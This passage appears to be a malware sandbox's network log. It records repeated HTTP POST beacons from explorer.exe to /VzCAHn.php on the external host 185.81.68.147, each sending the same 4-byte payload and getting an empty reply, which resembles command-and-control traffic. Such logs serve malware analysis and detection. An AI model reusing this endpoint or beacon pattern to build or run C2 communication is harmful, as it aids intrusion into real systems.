Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.8  49720        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:26.249710083 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:26.369688034 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:27.866368055 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.8  49721        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:28.117160082 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:28.238224983 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:29.714298010 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:28 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49722 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:29.937633038 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:30.060058117 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:31.386472940 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49723 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:31.609347105 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:31.729286909 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:33.076090097 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49724 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:33.312313080 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:33.432239056 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:34.915150881 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:33 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49725 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:35.140712976 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:35.262645006 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:36.764745951 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49726 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:37.000196934 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:37.124977112 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:38.624203920 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49727 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:38.875072956 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:38.994899035 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:40.482171059 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49728 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:40.720248938 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:40.844068050 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:42.167386055 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:41 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49729 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:42.390440941 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:42.511755943 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:44.115782022 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:43 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49730 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:44.344408989 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:44.464391947 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:45.794629097 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:45 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49731 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:46.031214952 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:46.151268959 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:47.462456942 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:46 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49732 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:47.709819078 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:47.829757929 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:49.163413048 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:48 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49733 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:49.391196012 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:49.513181925 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:51.043869972 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49734 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:51.403578997 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:51.523895025 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:53.068607092 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:52 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.8  49736        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:15:53.343363047 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:15:53.463334084 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:15:54.799954891 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:15:53 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.8  49737        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:15:55.030926943 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:15:55.151540995 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:15:56.634978056 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:15:55 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.8  49738        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:15:56.858864069 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:15:56.978751898 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:15:58.508359909 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:15:57 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.8  49739        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:15:58.734740973 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:15:58.854907990 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:16:00.193325043 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:15:59 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.8  49740        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:16:00.421674967 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:16:00.541811943 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:16:02.026175976 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:16:01 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.8  49741        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:16:02.250353098 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:16:02.374135971 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:16:03.940649986 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:16:02 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.8  49742        185.81.68.147   80                4084  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 10:16:04.220741034 CET  278                OUT        POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
    Host: 185.81.68.147
    Pragma: no-cache
    Content-type: text/html
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
    Content-Length: 4
Dec 17, 2024 10:16:04.340763092 CET  6                  OUT        Data Raw: 45 51 0d 5f
    Data Ascii: EQ_
Dec 17, 2024 10:16:05.931310892 CET  216                IN         HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 17:16:04 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    X-Powered-By: PHP/8.2.12
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 49743 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:06.155999899 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:06.275787115 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:07.799942017 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:06 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 49744 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:08.032773018 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:08.153772116 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:09.888241053 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:08 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 49745 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:10.124592066 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:10.244472980 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:11.558052063 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:10 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 49746 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:11.781506062 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:11.902003050 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:13.385603905 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 49747 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:13.625374079 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:13.746149063 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:15.071438074 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:14 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 49748 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:15.385389090 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:15.505170107 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:16.892796993 CET | 216 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:16:16 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 49750 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:16:17.128998995 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:16:17.248821974 CET | 6 | OUT | Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:16:18.731002092 CET | 216 | IN | HTTP/1.1 200 OK
